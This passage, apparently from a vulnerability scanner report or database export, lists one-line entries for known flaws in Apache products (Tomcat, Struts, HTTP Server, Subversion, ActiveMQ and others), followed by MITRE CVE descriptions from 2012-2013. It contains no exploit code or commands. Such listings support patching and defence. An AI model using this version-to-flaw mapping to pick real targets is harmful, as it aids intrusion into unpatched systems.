13044| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
13045| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
13046| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
13047| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
13048| [64006] Apache ActiveMQ up to 5.7.0 denial of service
13049| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
13050| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
13051| [8427] Apache Tomcat Session Transaction weak authentication
13052| [63960] Apache Maven 3.0.4 Default Configuration spoofing
13053| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
13054| [63750] Apache qpid up to 0.20 checkAvailable denial of service
13055| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
13056| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
13057| [63747] Apache Rave up to 0.20 User Account information disclosure
13058| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
13059| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
13060| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
13061| [7687] Apache CXF up to 2.7.2 Token weak authentication
13062| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
13063| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
13064| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
13065| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
13066| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
13067| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
13068| [63090] Apache Tomcat up to 4.1.24 denial of service
13069| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
13070| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
13071| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
13072| [62833] Apache CXF -/2.6.0 spoofing
13073| [62832] Apache Axis2 up to 1.6.2 spoofing
13074| [62831] Apache Axis up to 1.4 Java Message Service spoofing
13075| [62830] Apache Commons-httpclient 3.0 Payments spoofing
13076| [62826] Apache Libcloud up to 0.11.0 spoofing
13077| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
13078| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
13079| [62661] Apache Axis2 unknown vulnerability
13080| [62658] Apache Axis2 unknown vulnerability
13081| [62467] Apache Qpid up to 0.17 denial of service
13082| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
13083| [6301] Apache HTTP Server mod_pagespeed cross site scripting
13084| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
13085| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
13086| [62035] Apache Struts up to 2.3.4 denial of service
13087| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
13088| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
13089| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
13090| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
13091| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
13092| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
13093| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
13094| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
13095| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
13096| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
13097| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
13098| [61229] Apache Sling up to 2.1.1 denial of service
13099| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
13100| [61094] Apache Roller up to 5.0 cross site scripting
13101| [61093] Apache Roller up to 5.0 cross site request forgery
13102| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
13103| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
13104| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
13105| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
13106| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
13107| [60708] Apache Qpid 0.12 unknown vulnerability
13108| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
13109| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
13110| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
13111| [4882] Apache Wicket up to 1.5.4 directory traversal
13112| [4881] Apache Wicket up to 1.4.19 cross site scripting
13113| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
13114| [60352] Apache Struts up to 2.2.3 memory corruption
13115| [60153] Apache Portable Runtime up to 1.4.3 denial of service
13116| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
13117| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
13118| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
13119| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
13120| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
13121| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
13122| [4571] Apache Struts up to 2.3.1.2 privilege escalation
13123| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
13124| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
13125| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
13126| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
13127| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
13128| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
13129| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
13130| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
13131| [59888] Apache Tomcat up to 6.0.6 denial of service
13132| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
13133| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
13134| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
13135| [59850] Apache Geronimo up to 2.2.1 denial of service
13136| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
13137| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
13138| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
13139| [58413] Apache Tomcat up to 6.0.10 spoofing
13140| [58381] Apache Wicket up to 1.4.17 cross site scripting
13141| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
13142| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
13143| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
13144| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
13145| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
13146| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
13147| [57568] Apache Archiva up to 1.3.4 cross site scripting
13148| [57567] Apache Archiva up to 1.3.4 cross site request forgery
13149| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
13150| [4355] Apache HTTP Server APR apr_fnmatch denial of service
13151| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
13152| [57425] Apache Struts up to 2.2.1.1 cross site scripting
13153| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
13154| [57025] Apache Tomcat up to 7.0.11 information disclosure
13155| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
13156| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
13157| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
13158| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
13159| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
13160| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
13161| [56512] Apache Continuum up to 1.4.0 cross site scripting
13162| [4285] Apache Tomcat 5.x JVM getLocale denial of service
13163| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
13164| [4283] Apache Tomcat 5.x ServletContect privilege escalation
13165| [56441] Apache Tomcat up to 7.0.6 denial of service
13166| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
13167| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
13168| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
13169| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
13170| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
13171| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
13172| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
13173| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
13174| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
13175| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
13176| [54693] Apache Traffic Server DNS Cache unknown vulnerability
13177| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
13178| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
13179| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
13180| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
13181| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
13182| [54012] Apache Tomcat up to 6.0.10 denial of service
13183| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
13184| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
13185| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
13186| [52894] Apache Tomcat up to 6.0.7 information disclosure
13187| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
13188| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
13189| [52786] Apache Open For Business Project up to 09.04 cross site scripting
13190| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
13191| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
13192| [52584] Apache CouchDB up to 0.10.1 information disclosure
13193| [51757] Apache HTTP Server 2.0.44 cross site scripting
13194| [51756] Apache HTTP Server 2.0.44 spoofing
13195| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
13196| [51690] Apache Tomcat up to 6.0 directory traversal
13197| [51689] Apache Tomcat up to 6.0 information disclosure
13198| [51688] Apache Tomcat up to 6.0 directory traversal
13199| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
13200| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
13201| [50626] Apache Solr 1.0.0 cross site scripting
13202| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
13203| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
13204| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
13205| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
13206| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
13207| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
13208| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
13209| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
13210| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
13211| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
13212| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
13213| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
13214| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
13215| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
13216| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
13217| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
13218| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
13219| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
13220| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
13221| [47214] Apachefriends xampp 1.6.8 spoofing
13222| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
13223| [47162] Apachefriends XAMPP 1.4.4 weak authentication
13224| [47065] Apache Tomcat 4.1.23 cross site scripting
13225| [46834] Apache Tomcat up to 5.5.20 cross site scripting
13226| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
13227| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
13228| [86625] Apache Struts directory traversal
13229| [44461] Apache Tomcat up to 5.5.0 information disclosure
13230| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
13231| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
13232| [43663] Apache Tomcat up to 6.0.16 directory traversal
13233| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
13234| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
13235| [43516] Apache Tomcat up to 4.1.20 directory traversal
13236| [43509] Apache Tomcat up to 6.0.13 cross site scripting
13237| [42637] Apache Tomcat up to 6.0.16 cross site scripting
13238| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
13239| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
13240| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
13241| [40924] Apache Tomcat up to 6.0.15 information disclosure
13242| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
13243| [40922] Apache Tomcat up to 6.0 information disclosure
13244| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
13245| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
13246| [40656] Apache Tomcat 5.5.20 information disclosure
13247| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
13248| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
13249| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
13250| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
13251| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
13252| [40234] Apache Tomcat up to 6.0.15 directory traversal
13253| [40221] Apache HTTP Server 2.2.6 information disclosure
13254| [40027] David Castro Apache Authcas 0.4 sql injection
13255| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
13256| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
13257| [3414] Apache Tomcat WebDAV Stored privilege escalation
13258| [39489] Apache Jakarta Slide up to 2.1 directory traversal
13259| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
13260| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
13261| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
13262| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
13263| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
13264| [38524] Apache Geronimo 2.0 unknown vulnerability
13265| [3256] Apache Tomcat up to 6.0.13 cross site scripting
13266| [38331] Apache Tomcat 4.1.24 information disclosure
13267| [38330] Apache Tomcat 4.1.24 information disclosure
13268| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
13269| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
13270| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
13271| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
13272| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
13273| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
13274| [37292] Apache Tomcat up to 5.5.1 cross site scripting
13275| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
13276| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
13277| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
13278| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
13279| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
13280| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
13281| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
13282| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
13283| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
13284| [36225] XAMPP Apache Distribution 1.6.0a sql injection
13285| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
13286| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
13287| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
13288| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
13289| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
13290| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
13291| [34252] Apache HTTP Server denial of service
13292| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
13293| [33877] Apache Opentaps 0.9.3 cross site scripting
13294| [33876] Apache Open For Business Project unknown vulnerability
13295| [33875] Apache Open For Business Project cross site scripting
13296| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
13297| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
13298|
13299| MITRE CVE - https://cve.mitre.org:
13300| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
13301| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
13302| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
13303| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
13304| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
13305| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
13306| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
13307| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
13308| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
13309| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
13310| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
13311| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
13312| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
13313| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
13314| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
13315| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
13316| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
13317| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
13318| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
13319| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
13320| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
13321| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
13322| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
13323| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
13324| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
13325| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
13326| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
13327| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
13328| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
13329| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
13330| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13331| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
13332| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
13333| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
13334| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
13335| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
13336| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
13337| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
13338| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
13339| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
13340| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
13341| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13342| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13343| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13344| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
